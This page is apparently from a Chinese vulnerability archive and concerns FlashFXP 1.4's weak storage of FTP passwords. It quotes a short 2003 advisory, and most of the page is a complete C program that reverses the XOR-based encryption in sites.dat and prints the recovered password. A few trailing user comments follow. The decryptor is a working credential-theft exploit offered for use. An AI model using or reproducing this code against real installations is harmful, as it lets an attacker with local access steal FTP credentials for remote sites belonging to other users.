FlashFXP 1.4 – User Password Encryption
漏洞ID | 1053863 | 漏洞类型 | |
发布时间 | 2003-05-05 | 更新时间 | 2003-05-05 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7499/info
FlashFXP uses a trivially reversible algorithm to encrypt FTP user credentials. Local attackers with access to the sites.data may exploit this weakness to gain unauthorized access to FTP user credentials for remote sites.
/* Flashfxp sites.dat decryption
* By: [email protected]
* L33tsecurity 2003
*/
#include <math.h>
#include <stdio.h>
#include <stdlib.h>
#define VERSION 1
char magic[] ={ 0x79,0x41,0x33, 0x36, 0x7A, 0x41, 0x34 ,0x38, 0x64, 0x45 ,0x68, 0x66, 0x72, 0x76, 0x67 ,0x68,
0x47, 0x52, 0x67, 0x35, 0x37, 0x68, 0x35, 0x55, 0x6C ,0x44 ,0x76, 0x33 ,0x00 ,0x00 ,0x00, 0x00, };
char b[]={ 0x36,0xd8,0x7f,0xc2,0x07,0x16,0xc3};
/* kernel */
//char b[]={ 0x74, 0x92, 0x43 ,0x9C, 0x25, 0xEE ,0x27, 0xA1, 0x2D, 0xC2, 0x77, 0x84,};
int main(int argc, char **argv)
{
unsigned char temp;
unsigned char out[128];
int i;
temp = b[0];
for (i = 1; i < sizeof(b); i++)
{
out[i - 1] = (b[i] ^ magic[i - 1]) - temp - (i + 1) % 2;
temp = b[i % 29];
};
out[i - 1] = 0;
printf("DECRYPTED PASSWORD IS: %sn",(char *)&out);
return 0;
}
KDE LISa多个缓冲区溢出漏洞 漏洞ID 1203567 漏洞类型 缓冲区溢出 发布时间 2002-11-29 更新时间 2002-11-29 CVE编号 CVE-2002-1306 CNNVD-ID CNNVD-200211-062 漏洞平台 N/A C…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666